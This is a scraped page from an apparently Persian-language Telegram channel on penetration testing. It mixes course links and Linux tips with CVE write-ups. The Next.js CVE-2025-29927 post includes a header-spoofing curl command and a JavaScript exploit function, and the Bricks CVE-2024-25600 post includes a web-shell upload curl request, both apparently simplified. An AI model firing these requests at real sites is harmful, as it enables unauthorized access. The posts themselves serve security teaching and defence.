Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
حضور پر شور مردم در لحظه تحویل سال ۱۴۰۴ در شهرستان پاسارگاد, آرامگاه کورش بزرگ
27👎8❤‍🔥1
اطلاعات مربوط به نام میزبان.pdf
820.7 KB
این پست به بررسی اطلاعات نام میزبان ها (Hostnames) و نقش کلیدی آنها در حملات سایبری و تست نفوذ میپردازد.

📌 آنچه در این پست یاد میگیرید:

🔹 شناسایی اهداف حیاتی شبکه با تحلیل نام میزبانها (مثل VPN، Citrix، Exchange، SSO).
🔹 تکنیکهای نفوذ :

    حمله Password Spraying به سرویسهای بدون MFA (مثال: VPN، Citrix).

    🔹 استفاده از Log Stealer برای استخراج اعتبارنامه ها و Lateral Movement.
    🔹 ابزارهای کلیدی: Nmap, Hydra, Metasploit, OpenVPN.
    🔹 مثالهای عملی با دستورات فنی (اسکن پورتها، تست Breakout در Citrix، سرقت لاگها).
    🔹 دفاع مؤثر: محدودسازی دسترسی، رمزنگاری لاگها، نظارت بر فعالیت ها.

#Recon
@TryHackBox
👍42🙏1
Try Hack Box
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security + بخش : رمزنگاری دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی…
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security +

بخش : ادامه رمزنگاری

دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش می‌دهد.

قسمت اول :
  https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
قسمت پنجم :
https://youtu.be/7xhLSLB79EI
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید.


----------
🆔 @TryHackBox
----------
👍8🙏2
Try Hack Box
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security + بخش : ادامه رمزنگاری دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات،…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :

@Unique_exploitbot
دوستان از این بعد لوگوی ما این خواهد بود و در مقالات و کتابها از این لوگو استفاده خواهیم کرد
🔥10👍1🌚1
#CVE-2025-29927

در فریم‌ورک Next.js React یک آسیب‌پذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص می‌تواند برای دور زدن بررسی‌های احراز هویت مورد سوءاستفاده قرار گیرد.

این آسیب‌پذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.

Next.js از هدر داخلی
x-middleware-subrequest
برای جلوگیری از ایجاد حلقه‌های بی‌نهایت در درخواست‌های بازگشتی استفاده می‌کند.
با این حال، رد شدن اجرای Middleware باعث می‌شود درخواست‌ها بتوانند بررسی‌های حیاتی، از جمله اعتبارسنجی کوکی‌های احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.

این مشکل در نسخه‌های ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه می‌شود از پردازش درخواست‌های کاربران خارجی که حاوی هدر x-middleware-subrequest هستند، جلوگیری شود.

راشد علام (با نام‌های مستعار zhero و cold-try )، محققی که این آسیب‌پذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه می‌شود هرچه سریع‌تر پچ های امنیتی اعمال شوند.

به گفته JFrog، این باگ به مهاجمان اجازه می‌دهد به راحتی بررسی‌های احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وب‌سایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.

همچنین هشدار داده شده که هر وب‌سایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسی‌های اضافی استفاده می‌کند، در معرض این آسیب‌پذیری (CVE-2025-29927) قرار دارد و مهاجمان می‌توانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
👍1
Try Hack Box
#CVE-2025-29927 در فریم‌ورک Next.js React یک آسیب‌پذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص می‌تواند برای دور زدن بررسی‌های احراز هویت مورد سوءاستفاده قرار گیرد. این آسیب‌پذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS…
مکانیزم آسیب‌پذیری

این آسیب‌پذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقه‌های بازگشتی (recursive loops) در درخواست‌های Middleware استفاده می‌شود.

کد آسیب‌پذیر (شبیه‌سازی):
// middleware.js (نسخه‌های آسیب‌پذیر)
export function middleware(request) {
const isSubRequest = request.headers.get('x-middleware-subrequest');

if (isSubRequest) {
return NextResponse.next();
}

// بررسی‌های احراز هویت
if (!isAuthenticated(request)) {
return new Response('Unauthorized', { status: 401 });
}

return NextResponse.next();
}

نحوه سوءاستفاده

مهاجم می‌تواند با اضافه کردن هدر جعلی به درخواست‌های خود، Middleware را دور بزند:
curl -H "x-middleware-subrequest: 1" https://victim.com/admin

@TryHackBox
👏31
Try Hack Box
مکانیزم آسیب‌پذیری این آسیب‌پذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقه‌های بازگشتی (recursive loops) در درخواست‌های Middleware استفاده می‌شود.…
نمونه کد اکسپلویت
async function exploit(targetUrl, protectedRoute) {
const headers = new Headers();
headers.append('x-middleware-subrequest', '1');

const response = await fetch(`${targetUrl}${protectedRoute}`, {
headers: headers
});

return response.status === 200;
}

راهکارهای اصلاح
ارتقاء نسخه: استفاده از نسخه‌های اصلاح شده Next.js
میان‌افزار اصلاح شده:
export function middleware(request) {
// بررسی منشأ درخواست
const isInternalRequest = request.headers.get('x-verified-internal') === 'true';

// فقط برای درخواست‌های داخلی اجازه رد شدن بدهد
if (request.headers.get('x-middleware-subrequest') && !isInternalRequest) {
return new Response('Invalid request', { status: 400 });
}

// ادامه منطق احراز هویت
}


راهکارهای دفاعی
:

پیاده‌سازی بررسی‌های احراز هویت در سطح صفحه

استفاده از کوکی‌های امنیتی با HttpOnly و SameSite Strict

لاگ‌گیری از درخواست‌های حاوی هدر مشکوک



این آسیب‌پذیری نمونه‌ای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیش‌فرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد.
این مشکل در معماری سیستم‌های مبتنی بر Middleware رایج است، چرا که توسعه‌دهندگان اغلب فرض می‌کنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند

@TryHackBox
👏51👍1🔥1
تحلیل Limitless OSINT Challenges - تمرین‌های پیشرفته جمع‌آوری اطلاعات آزاد

معرفی Limitless OSINT Challenges

یک مجموعه تمرین عملی برای متخصصان و علاقه‌مندان به جمع‌آوری اطلاعات از منابع آزاد (OSINT) است که در وبسایت http://limitless-osint.com/challenges ارائه شده است.

#Osint
@TryHackBox
🔥3👍2
🧩 کانال های دیگر ما :

🔆 در اینجا رودمپ های مختلف میزاریم و یکسری منابع :

🆔 @TryHackBoxOfficial


🔆 در اینجا هم داستان مربوط هک و مهندسی اجتماعی و اوسینت میزاریم :


🆔 @TryHackBoxStory
👍2
دوستان ما بخشی رو راه اندازی کردیم به اسم رادیو زیرو پاد که در اینجا فعلا داستان هایی که قرار میدیم رو برای شما به صورت پادکست در اوردیم و اگر استقبال خوبی بشه بقیه موارد هم به پادکست اضافه می شود .

درحال حاضر میتوانید داستان هایی که قرار دادیم را به طور پادکست پلی کنید و لذت ببرید .

@RadioZeroPod
❤‍🔥8👍4
دوستان درحال راه اندازی لابراتور برای شما هستم
و درگیر ترجمه یک کتاب که به زودی قرار میگیره

برای همین ممکنه فعلا پست آموزشی نباشه

با تشکر از صبر شما .
🤩213🔥1
درود دوستان عزیز

اگر از آموزش‌های ما استفاده می‌کنید و دوست دارید از تلاش ما حمایت کنید، می‌توانید از طریق لینک زیر کمک کوچکی به ما داشته باشید

https://daramet.com/TryHackBox

راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید. 

ممنون که همراه ما هستید. 
10👍1👏1
هکرها از یک قابلیت کمتر شناخته شده در وردپرس به نام Must Use Plugins (پلاگین‌های ضروری) سوءاستفاده می‌کنند تا بدافزارها را نصب و از دید مدیران سایت پنهان کنند، در حالی که دسترسی دائمی از راه دور را حفظ می‌کنند.

قابلیت Must Use Plugins (mu-plugins) چیست؟
این ویژگی که با نام mu-plugins نیز شناخته می‌شود، در سال ۲۰۲۲ به سیستم مدیریت محتوای وردپرس اضافه شد. پلاگین‌هایی که در پوشه خاصی به نام /mu-plugins قرار می‌گیرند، به‌صورت خودکار توسط وردپرس اجرا می‌شوند و نیازی به فعال‌سازی یا تأیید از طریق پیشخوان مدیریت ندارند.

این پلاگین‌ها در بخش معمولی «پلاگین‌ها» نمایش داده نمی‌شوند، بنابراین کاربران نمی‌توانند به‌صورت تصادفی آن‌ها را غیرفعال یا حذف کنند. همین موضوع، این پوشه را به مکانی ایده‌آل برای پنهان‌کردن بدافزارها تبدیل کرده است.


افزایش سوءاستفاده هکرها از mu-plugins
بر اساس گزارش گوَدَدی سیکوری (GoDaddy Sucuri)، هکرها حداقل از فوریه امسال از این قابلیت سوءاستفاده کرده‌اند و اکنون این فعالیت به‌طور قابل توجهی افزایش یافته است.

هکرها با نفوذ به سایت‌های وردپرس، بدافزارها را در پوشه mu-plugins قرار می‌دهند، چون می‌دانند که این کدها به‌صورت خودکار اجرا شده و در پیشخوان سایت نمایش داده نمی‌شوند. علاوه بر این، از آنجا که این قابلیت نسبتاً ناشناخته است، بسیاری از ابزارهای امنیتی وردپرس حتی این پوشه را برای تهدیدات احتمالی اسکن نمی‌کنند.

نمونه‌هایی از بدافزارهای کشف‌شده در mu-plugins
سیکوری متوجه شده است که هکرها از mu-plugins برای موارد زیر استفاده می‌کنند:
- نصب بک‌دورها و وب‌شل‌ها
- قراردادن اسپم سئو در سایت‌های هک‌شده
- تغییر مسیر ترافیک به سایت‌های مخرب

برخی از فایل‌های مخرب شناسایی‌شده:
- wp-content/mu-plugins/redirect.php
- wp-content/mu-plugins/index.php
- wp-content/mu-plugins/custom-js-loader.php

در این میان، فایل redirect.php خود را به‌عنوان «به‌روزرسانی مرورگر» جا می‌زند تا کاربران را فریب دهد و آن‌ها را مجبور به نصب بدافزاری کند که می‌تواند داده‌ها را سرقت کند یا payloadهای اضافی را دانلود کند.

💢 هشدار به مالکان سایت‌های وردپرس
این طیف گسترده از سوءاستفاده‌ها نشان می‌دهد که این روش در حال محبوب‌شدن در بین گروه‌های هکری است که از این پوشه به‌عنوان پایگاهی پایدار برای فعالیت‌های مخرب استفاده می‌کنند.

توصیه‌های امنیتی:
محتوای پوشه mu-plugins را بررسی کنید.
اگر از پلاگین‌های Must Use استفاده نمی‌کنید، آن‌ها را حذف کنید.
مطمئن شوید که حذف به‌صورت دائمی انجام شده است.

با این اقدامات، می‌توانید از سایت خود در برابر این تهدید پنهان محافظت کنید.

@TryHackBox
👍7
آسیب‌پذیری CVE-2024-25600 در پلاگین Bricks وردپرس

معرفی آسیب‌پذیری:
این یک آسیب‌پذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخه‌های 1.9.6 و قبلتر) است.

جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترل‌نشده در admin-ajax.php
- امکان آپلود فایل‌های PHP مخرب
- دسترسی کامل به سرور (web shell)

- کد آسیب‌پذیر:

  // در فایل اصلی پلاگین
add_action('wp_ajax_bricks_upload', 'handle_file_upload');
// عدم وجود بررسی‌های امنیتی کافی

نمونه اکسپلویت:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" \
-F "action=bricks_upload" \
-F "file=@exploit.php"

تأثیرات:
- نصب وب‌شل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستم‌ها

راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان به‌روزرسانی

2. پیشگیرانه:
- محدود کردن دسترسی به admin-ajax.php
- پیاده‌سازی WAF با قوانین مخصوص

تشخیص سوءاستفاده:
- بررسی لاگ‌ها برای درخواست‌های غیرعادی به admin-ajax.php
- جستجوی فایل‌های PHP جدید در دایرکتوری uploads

نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .

https://github.com/Chocapikk/CVE-2024-25600

#Cve
@TryHackBox
👍1
این دستور را در ترمینال خود وارد کنید:

watch -d -n 1 sensors

توضیح :
این دستور اطلاعات دمایی قطعات سخت‌افزاری سیستم شما را به صورت زنده (هر 1 ثانیه) نمایش می‌دهد، شامل:
- دمای پردازنده (CPU)
- دمای کارت گرافیک (GPU)
- دمای مودم وای‌فای (Wi-Fi)
- دمای حافظه‌های NVMe SSD
- دمای هارددیسک‌های (HDD)

#### ویژگی‌های دستور:
- -d:
تغییرات را هایلایت می‌کند
- -n 1:
بروزرسانی هر 1 ثانیه
- sensors:
ابزار اصلی خواندن سنسورهای سخت‌افزاری

نکات فنی:
1. نیاز به نصب بسته lm-sensors دارد (در اوبونتو: sudo apt install lm-sensors)
2. قبل از استفاده باید سنسورها را پیکربندی کنید: sudo sensors-detect
3. برای سیستم‌های مختلف ممکن است خروجی متفاوت باشد
#linux
@TryHackBox
4
نکته سریع لینوکس: حذف پوشه‌های خالی

اگر می‌خواهید پوشه‌های خالی را حذف کنید، می‌توانید از دستور find استفاده کنید:

find . -type d -empty -exec rmdir -v {} +

#### توضیح گزینه‌ها:
- -type d:
فقط پوشه‌ها (دایرکتوری‌ها) را جستجو می‌کند
- -empty:
فقط پوشه‌های خالی را انتخاب می‌کند
- -exec rmdir -v {} +:
دستور rmdir را برای حذف پوشه‌ها اجرا می‌کند و عملیات را نمایش می‌دهد (-v)

روش جایگزین:
find . -type d -empty -delete

نکات مهم:
1. rmdir
فقط پوشه‌های کاملاً خالی را حذف می‌کند (حاوی هیچ فایل یا پوشه دیگری نباشند)
2. گزینه -delete در روش دوم مستقیم پوشه‌ها را حذف می‌کند
3. نقطه (.) در ابتدای دستور به معنای جستجو از پوشه جاری است

مثال کاربردی:
اگر بخواهید پوشه‌های خالی را در مسیر /home/user/docs حذف کنید:
find /home/user/docs -type d -empty -delete

این دستورات برای تمیزکاری خودکار پوشه‌ها و مدیریت فضای ذخیره‌سازی بسیار مفید هستند.

#Linux #لینوکس
@TryHackBox
6👍2
در دستور find گزینه -exec وجود دارد که می‌توان از آن برای فراخوانی یک ابزار خارجی و انجام عملیات خاص روی فایل‌های منطبق با معیارهای جستجو استفاده کرد.

مثال:
find ~/ -type f -exec ls -lah {} \;

این دستور برای انجام یک عمل یکسان روی چندین فایل در مکان‌های مختلف مفید است.

در این مثال، دستور ls -lah برای نمایش اطلاعاتی مانند مجوزها و سایر متاداده‌های هر فایل یافت‌شده اجرا می‌شود.
- علامت {} به‌عنوان جای‌نگهدار نام فایل عمل می‌کند و باید آخرین عنصر در لیست پارامترها باشد.
- علامت ; نشان‌دهنده پایان لیست پارامترهاست و باید با بک‌اسلش (\) محافظت شود، در غیر این صورت شل آن را تفسیر می‌کند.

همچنین می‌توانید به‌جای ; از + استفاده کنید تا پایان لیست پارامترها مشخص شود. بین + و {} باید فاصله وجود داشته باشد.

مثال با +:
find ~/ -type f -exec ls -lah {} +

همچنین می‌توانید چندین دستور را با -exec در find اجرا کنید، مثلاً:
find . -name "*.txt" -exec wc {} \; -exec du -sh {} \;

#نکته‌ #لینوکس
@TryHackBox
👍31🔥1
🔎 یک دورک گوگل که همیشه و همه‌جا جواب می‌دهد

در عملیات شناسایی (Recon)، می‌توانید از چیزی شبیه به این استفاده کنید:

© [COMPANY]. All rights reserved.


برای پیدا کردن تمام دامنه‌های اصلی مرتبط با یک شرکت در صورت نیاز، می‌توانید نتایج نامرتبط را از خروجی جستجو حذف کنید.

توضیح:
- این روش از Google Dorking برای پیدا کردن صفحاتی استفاده می‌کند که شامل عبارت کپی‌رایت استاندارد شرکت‌ها هستند.
- جایگزین کردن [COMPANY] با نام شرکت موردنظر (مثلاً © Google. All rights reserved.) می‌تواند دامنه‌های اصلی و ساب دامنه‌های آن را فاش کند.

- این تکنیک در جستجوی پیشرفته گوگل (Google Hacking) و مرحله شناسایی (Recon) برنامه‌های باگ بانتی مفید است.


#bugbounty #tips #recon
@TryHackBoc
👍9🔥21